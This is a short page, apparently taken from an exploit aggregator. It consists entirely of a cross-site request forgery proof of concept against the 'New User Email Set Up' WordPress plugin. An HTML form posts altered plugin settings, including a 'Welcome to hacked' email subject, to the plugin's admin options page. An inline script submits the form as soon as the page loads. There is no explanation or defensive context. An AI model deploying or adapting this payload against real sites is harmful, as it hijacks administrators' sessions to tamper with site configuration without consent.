Share
## https://sploitus.com/exploit?id=WPEX-ID:176D5761-4F01-4173-A70C-6052A6A9963E
<form id="test" action="https://example.com/wp-admin/options-general.php?page=new-user-email-set-up%2Fnewuseremailsetup.php" method="POST">
    <input type="text" name="option_page" value="nue-options-group">
    <input type="text" name="action" value="update">
    <input type="text" name="newuseremailhtml" value="text/HTML">
    <input type="text" name="newuseremailsubject" value="Welcome to hacked">
    <input type="text" name="newuseremailtext" value="hacked							">
    <input type="text" name="newuseremailfromaddress" value="Enter your admin email here">
    <input type="text" name="newuseremailfrom" value="Enter the name you want your admin email sent from here. eg. Admin">
    <input type="text" name="nue_submit" value="Save">
    <input type="text" name="newuseremailadmin" value="yes">
    <input type="text" name="newuseremailadminnotifydiff" value="no">
    <input type="text" name="newuseremailadminsubject" value="%blogname% - New User Registration">
    <input type="text" name="newuseremailadmintext" value="aaa">
    <input type="text" name="cmd" value="_s-xclick">
</form>
<script>
    document.getElementById("test").submit();
</script>